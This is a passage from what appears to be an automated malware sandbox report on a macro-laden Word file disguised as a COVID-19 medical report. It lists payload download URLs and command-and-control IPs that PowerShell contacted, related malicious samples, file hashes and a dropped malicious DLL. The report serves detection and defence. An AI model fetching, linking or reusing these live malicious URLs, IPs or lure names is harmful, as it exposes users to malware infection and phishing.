        • 6%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://remediis.comppowershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://solicon.us/allam-cycle-1c4gn/f5z/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
        • 6%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://www.litespeedtech.compowershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmpfalse
          		high
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
            		high
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpfalse
              		high
              http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpfalse
                		high
                https://remediis.compowershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpfalse
                  		high
                  http://www.riparazioni-radiotv.com/softaculous/DZz/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://www.starlingtechs.com/GNM/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://investor.msn.com/rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
                    		high
                    https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpfalse
                      		high
                      http://www.%s.comPApowershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		low
                      https://remediis.com/t/gm2X/powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      69.49.88.46
                      		unknownUnited States
                      		33734MPW-MACHLINK-NETUStrue
                      109.232.216.177
                      		unknownTurkey
                      		42807AEROTEK-ASTRtrue
                      71.72.196.159
                      		unknownUnited States
                      		10796TWC-10796-MIDWESTUStrue
                      5.2.81.171
                      		unknownTurkey
                      		3188ALASTYRTRtrue

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338773
                      Start date:12.01.2021
                      Start time:20:30:12
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 7m 39s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:XP-9743 Medical report COVID-19.doc
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:17
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDOC@26/7@2/4
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 33.2% (good quality ratio 31.6%)
                      • Quality average: 71.6%
                      • Quality standard deviation: 24.9%
                      HCA Information:
                      • Successful, ratio: 72%
                      • Number of executed functions: 35
                      • Number of non-executed functions: 1
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .doc
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Scroll down
                      • Close Viewer
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      20:30:36API Interceptor1x Sleep call for process: msg.exe modified
                      20:30:37API Interceptor32x Sleep call for process: powershell.exe modified
                      20:30:41API Interceptor867x Sleep call for process: rundll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      69.49.88.46AG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                      • 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/
                      FQ5754217297FF.docGet hashmaliciousBrowse
                      • 69.49.88.46/2hsmx8qypf/8iv55uq7hpxe/hf9tz7/
                      71.72.196.159FILE-092020.docGet hashmaliciousBrowse
                      • 71.72.196.159/Asgu9G/UPAJk1H/k1wB2h2IhMQGy9M4O/CwukNROTLhDmT5iz7yr/QNOGQRhP/
                      X5w6zls.exeGet hashmaliciousBrowse
                      • 71.72.196.159/YmBvqXK/A1bXsLoMSYg/i0gaWBtL9c/yD6C9feh/
                      #U5909#U531620.09.docGet hashmaliciousBrowse
                      • 71.72.196.159/HisuDo3My4/
                      #U5909#U531620-09.docGet hashmaliciousBrowse
                      • 71.72.196.159/IEHZ5/HVlPRDwFoj/OuQtgxrIROu80/9t0syM1s3J/
                      BCRYO2020.09.19.docGet hashmaliciousBrowse
                      • 71.72.196.159/UdroxO4ouHCZo3/SPUpyAXBlZAJ/kR4LZr6qJHOM3/9tr1e4XNde6jxg22B/j2TVTGpcHCpnic1/
                      drdgPfOU36.exeGet hashmaliciousBrowse
                      • 71.72.196.159/6YX6sQtKK6MLta/TbNsyU7EbVPMjL/0MoOi2xkKCNW7y67b/USvDoTSxSZ/BulSaK/
                      cC.exeGet hashmaliciousBrowse
                      • 71.72.196.159/LLRDDCScx1Byk2D/krMwjOaF56Uc9Il6eMD/WuP6hJZcQa4/5p5T7L/
                      #U304b#U3089#U306e#U5909#U66f419.docGet hashmaliciousBrowse
                      • 71.72.196.159/3oAMQ7MNt66lIE8EI/DizHtXLtgQHqx/U2NH3hw0GWPotmCV/dMZCjcyGRF/qUw6hgI/FwMSWVK67N4mSEoC/
                      LTB.docGet hashmaliciousBrowse
                      • 71.72.196.159/QxJ68bj/OcYZ8J9RWfz7qwepeY/7Zys/K1Bpu/5CRfSZCJqSBtKcz/dhIXBeS6vLJR/
                      #U6700#U65b0#U306e#U69cb#U9020#U56f3.docGet hashmaliciousBrowse
                      • 71.72.196.159/JMk30NNrO1ReTb/6XR5dMIuJFNZfcR/yg0fR2fj6mXvduKb/
                      HROF2020.docGet hashmaliciousBrowse
                      • 71.72.196.159/EMc53XBYQbN5Jl/
                      #U304b#U3089#U306e#U5909#U66f49#U6708.docGet hashmaliciousBrowse
                      • 71.72.196.159/1ieklOTBS/ak8HNcj/
                      DAT_2020_09_7444352632.docGet hashmaliciousBrowse
                      • 71.72.196.159/cv2mWGF5/67dqj/ZkWPeQbBjvdWajsuvx/lYL2/TljK64Me1bfzHxBI/
                      Dokumentation_FC_41232269.docGet hashmaliciousBrowse
                      • 71.72.196.159/ejSg6gT/pSnsS3gAqTGFHUm9V/Jg8Kv3cnCG2Miq94/Sf9xZ/
                      BIZ_18_09_2020_4070550449.docGet hashmaliciousBrowse
                      • 71.72.196.159/tiVhuDLoHxS/G2H7AH/
                      Betrag_2020_09_4036385628.docGet hashmaliciousBrowse
                      • 71.72.196.159/RQWehX/fgtv5/htJbK7vQCVUSRwZJeE/
                      SCNVS2020.09.docGet hashmaliciousBrowse
                      • 71.72.196.159/b9v6oT61Mzfa1oQAP/IIlXlIMvsnl/
                      ZZLEJDXT8LH-20200918.docGet hashmaliciousBrowse
                      • 71.72.196.159/v4zRqawC6/myK9u1BaFBM0ak/
                      #U5909#U531609_18.docGet hashmaliciousBrowse
                      • 71.72.196.159/w5aqN3cMRoz5Eq/
                      INF_18_09_2020.docGet hashmaliciousBrowse
                      • 71.72.196.159/5U1wQcRoWdLiEGx/gIcTfWkFIkHPs5yEqC/

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      AEROTEK-ASTRRe.invoice.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      36bjGck9ps.exeGet hashmaliciousBrowse
                      • 37.230.107.15
                      n1hou07jRi.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      SZOSVrCvEl.exeGet hashmaliciousBrowse
                      • 37.230.107.17
                      2LR7qIZpc9.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      QXfxLv6GGp.exeGet hashmaliciousBrowse
                      • 37.230.107.17
                      0908000090000.exeGet hashmaliciousBrowse
                      • 37.230.106.17
                      Tax Invoices IN102738 IN102739 IN102740 (2).exeGet hashmaliciousBrowse
                      • 37.230.107.13
                      Quotation 7339.exeGet hashmaliciousBrowse
                      • 37.230.107.16
                      kart bilgisizzz.exeGet hashmaliciousBrowse
                      • 37.230.106.16
                      CardFinans09000.exeGet hashmaliciousBrowse
                      • 37.230.106.17
                      0lQnavQlRv.exeGet hashmaliciousBrowse
                      • 37.230.107.13
                      payment invoice090909000.exeGet hashmaliciousBrowse
                      • 37.230.106.16
                      POUIYYY.exeGet hashmaliciousBrowse
                      • 37.230.106.16
                      invoice 2.exeGet hashmaliciousBrowse
                      • 37.230.107.15
                      invoice 2.exeGet hashmaliciousBrowse
                      • 37.230.107.15
                      TFTU6843783 - 32.exeGet hashmaliciousBrowse
                      • 94.199.200.89
                      BL NO - 010446090.exeGet hashmaliciousBrowse
                      • 94.199.200.89
                      09000000MMM090.exeGet hashmaliciousBrowse
                      • 37.230.106.17
                      sUHUL8pabJ.exeGet hashmaliciousBrowse
                      • 37.230.107.14
                      TWC-10796-MIDWESTUSAG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                      • 71.72.196.159
                      FQ5754217297FF.docGet hashmaliciousBrowse
                      • 71.72.196.159
                      invoice.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      N3TmJXOg4P.dllGet hashmaliciousBrowse
                      • 75.188.107.174
                      59973067.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      Electronic form.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      2020_12- Statement.docGet hashmaliciousBrowse
                      • 75.188.107.174
                      http://foodlike.kz/templates/QUJOpdohWbgqcRtXl3uAR0twmMS59eLk1cnA6P2oA15NZcjPZPj0GO2DF/Get hashmaliciousBrowse
                      • 24.164.79.147
                      utox.exeGet hashmaliciousBrowse
                      • 174.99.153.50
                      New Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                      • 70.92.118.112
                      fdwv4hWF1M.exeGet hashmaliciousBrowse
                      • 72.133.174.230
                      Check.vbsGet hashmaliciousBrowse
                      • 69.76.61.62
                      RB1NsQ9LQf.exeGet hashmaliciousBrowse
                      • 71.79.68.222
                      42H3JnmK5y.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      7M5xbLL8eO.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      gQszb56YfO.exeGet hashmaliciousBrowse
                      • 71.72.196.159
                      d21iCa31cs.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      dXp0Z8K4ya.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      NL5ykZj9sR.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      vr2UB6w0Lu.exeGet hashmaliciousBrowse
                      • 98.103.204.12
                      ALASTYRTRWeBU3HLcSGLmmDb.exeGet hashmaliciousBrowse
                      • 5.2.81.142
                      arrival notice-ETA 10th-11,2020.exeGet hashmaliciousBrowse
                      • 185.8.128.151
                      P.O_0006983487302.pdf.exeGet hashmaliciousBrowse
                      • 5.2.84.232
                      P.O-00490585693.pdf.exeGet hashmaliciousBrowse
                      • 5.2.84.232
                      SHIPPING DOCS.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Request Quotation.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      SOA.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      payment details.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Request Quotation.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Request Quotation.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      docss.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      SOA JUL..exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      DOCUMENTS.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      MT1O3 copy.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      PURCHASE ORDER.bin.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      Electronic form.docGet hashmaliciousBrowse
                      • 185.8.33.27
                      REMITTANCE COPY.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      SOA.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      PURCHASE ORDER.exeGet hashmaliciousBrowse
                      • 5.2.84.160
                      ionua.exeGet hashmaliciousBrowse
                      • 5.2.81.142
                      MPW-MACHLINK-NETUSAG60273928I_COVID-19_SARS-CoV-2.docGet hashmaliciousBrowse
                      • 69.49.88.46
                      FQ5754217297FF.docGet hashmaliciousBrowse
                      • 69.49.88.46

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\XP-9743 Medical report COVID-19.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 13 03:30:33 2021, length=161792, window=hide
                      Category:dropped
                      Size (bytes):2238
                      Entropy (8bit):4.553735922091283
                      Encrypted:false
                      SSDEEP:48:8T/XT3In3e/7J0e/kfQh2T/XT3In3e/7J0e/kfQ/:8T/XLIn3eOe8fQh2T/XLIn3eOe8fQ/
                      MD5:A1640691CEEC8E432223B5D9BF210FA0
                      SHA1:9774A9DCEEEDA35DEE3885096DEB30165BFAE407
                      SHA-256:A7025C15BBD7A8393D83B6C7AADDC266A589383C76A6C9A3F4095F28FF89213E
                      SHA-512:24EAB918AA1E67DD52173FE047EDCC327C138B8C9A07352C28691C20470E743B6EDA22EFE48AEAA7A50001355E99407C2E6BB7AFACE29C8B7EC1644EB5E5E5DB
                      Malicious:false
                      Preview: L..................F.... ....S...{...S...{...|..d....x...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..x..-R.# .XP-974~1.DOC..t.......Q.y.Q.y*...8.....................X.P.-.9.7.4.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\XP-9743 Medical report COVID-19.doc.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.X.P.-.9.7.4.3. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):131
                      Entropy (8bit):5.033583001902089
                      Encrypted:false
                      SSDEEP:3:M1X4WztELQSjmIfFu4olfiWztELQSjmIfFu4omX1X4WztELQSjmIfFu4ov:MDELyIfjufrELyIfjNELyIfjy
                      MD5:704CBC7C6FF8908BC5C52CE42F4761B5
                      SHA1:5D1240BCC4954C9A5BBE7F8E5DFF3395536CE3BB
                      SHA-256:53B0E81D3E027793CE23B9E4393A9FDDBCC24D1FFEE1ECC4661FD6C0079EAA25
                      SHA-512:1720DCF3868389BC3C9280DFA018385A4AE383B1A84680BBA3B4BFC70AEFBDA6EA3C8A5F04DA75144B47EDFFA0913180C032488018F9A4915B04D159528D1974
                      Malicious:false
                      Preview: [doc]..XP-9743 Medical report COVID-19.LNK=0..XP-9743 Medical report COVID-19.LNK=0..[doc]..XP-9743 Medical report COVID-19.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFVIB84821J1PYPBOEY5.temp
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):8016
                      Entropy (8bit):3.586617243298514
                      Encrypted:false
                      SSDEEP:96:chQCsMqftMqvsqvJCwolz8hQCsMqftMqvsEHyqvJCwor/z1PYftJHyf8Iht+lUVJ:cy3olz8y7Hnor/z1bf8IBIu
                      MD5:5CC20A1959F6110E368E14FCE4C71E93
                      SHA1:17DCB465855248585EDE81A4B56D045B043B1BE7
                      SHA-256:8E444E6BEFE6AFC6A1041D54AC7D9290E2595EF93BAD5E4D820949E1841117E1
                      SHA-512:A415E620A9357D9F6D239887EACB0CAD8E5907F8CE29247D098526362650E80D7F18B0D5FE6D13351E563CD2F5EAEFC8F70CD26AE915EC7C8CDABCCBE2409BC5
                      Malicious:false
                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                      C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):162
                      Entropy (8bit):2.431160061181642
                      Encrypted:false
                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                      Malicious:false
                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                      C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):340824
                      Entropy (8bit):4.347471014428068
                      Encrypted:false
                      SSDEEP:3072:aG9ctfNneahaNfjraHoEkApi23X5TKavlyw8W8:aG+Fe17mHoU/3NywH8
                      MD5:A675444E1D39C57D28ACE66CCDF56209
                      SHA1:B40E2B76AFE537083B4F024594A262238B7733CC
                      SHA-256:EC2A858FF4D3505EADEEB514A91ED38D34D80A81723DD48F8049A1E963C3587C
                      SHA-512:8CC242A9310AB3F25EB46453FAD48475ED2AA0E7EC0AD141C01339335B8905DF1578F14EBEB318EDF90014ECA794438C8CF1F2704549943056C00E6D587BD502
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.._...........!...2.F...........!.......`...............................`...............................................p..d.......................X....P......................................................xr...............................text....C.......D.................. ..`.rdata.......`.......H..............@..@.data........p.......J..............@....text4...............T..............@....text5..d....@...................... ..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic, Author: Ambre Vidal, Template: Normal.dotm, Last Saved By: Ethan Vasseur, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 17:56:00 2021, Last Saved Time/Date: Tue Jan 12 17:57:00 2021, Number of Pages: 1, Number of Words: 2466, Number of Characters: 14061, Security: 8
                      Entropy (8bit):6.693119364534795
                      TrID:
                      • Microsoft Word document (32009/1) 79.99%
                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                      File name:XP-9743 Medical report COVID-19.doc
                      File size:160861
                      MD5:da92c55d4b08367fb79a6bc6ae4da985
                      SHA1:8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
                      SHA256:137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61
                      SHA512:9ef0222dd48f94d149e090f17ab465389d489eefd5b4cad14867aa1bb5bbd4ca4af1a0d88ab62d74a90c3dbdb906cabdd823cd8105516a9b19fe642005f17e92
                      SSDEEP:3072:EX9ufstRUUKSns8T00JSHUgteMJ8qMD7g8NtP:69ufsfgIf0pL8PP
                      File Content Preview:........................>......................................................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4eea2aaa4b4b4a4

                      Static OLE Info

                      General

                      Document Type:OLE
                      Number of OLE Files:1

                      OLE File "XP-9743 Medical report COVID-19.doc"

                      Indicators

                      Has Summary Info:True
                      Application Name:Microsoft Office Word
                      Encrypted Document:False
                      Contains Word Document Stream:True
                      Contains Workbook/Book Stream:False
                      Contains PowerPoint Document Stream:False
                      Contains Visio Document Stream:False
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Code Page:1252
                      Title:
                      Subject:Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic
                      Author:Ambre Vidal
                      Keywords:
                      Comments:
                      Template:Normal.dotm
                      Last Saved By:Ethan Vasseur
                      Revion Number:1
                      Total Edit Time:0
                      Create Time:2021-01-12 17:56:00
                      Last Saved Time:2021-01-12 17:57:00
                      Number of Pages:1
                      Number of Words:2466
                      Number of Characters:14061
                      Creating Application:Microsoft Office Word
                      Security:8

                      Document Summary

                      Document Code Page:-535
                      Number of Lines:117
                      Number of Paragraphs:32
                      Thumbnail Scaling Desired:False
                      Company:
                      Contains Dirty Links:False
                      Shared Document:False
                      Changed Hyperlinks:False
                      Application Version:917504

                      Streams with VBA

                      VBA File Name: Gx8fznt8p0b, Stream Size: 10973
                      General
                      Stream Path:Macros/VBA/Gx8fznt8p0b
                      VBA File Name:Gx8fznt8p0b
                      Stream Size:10973
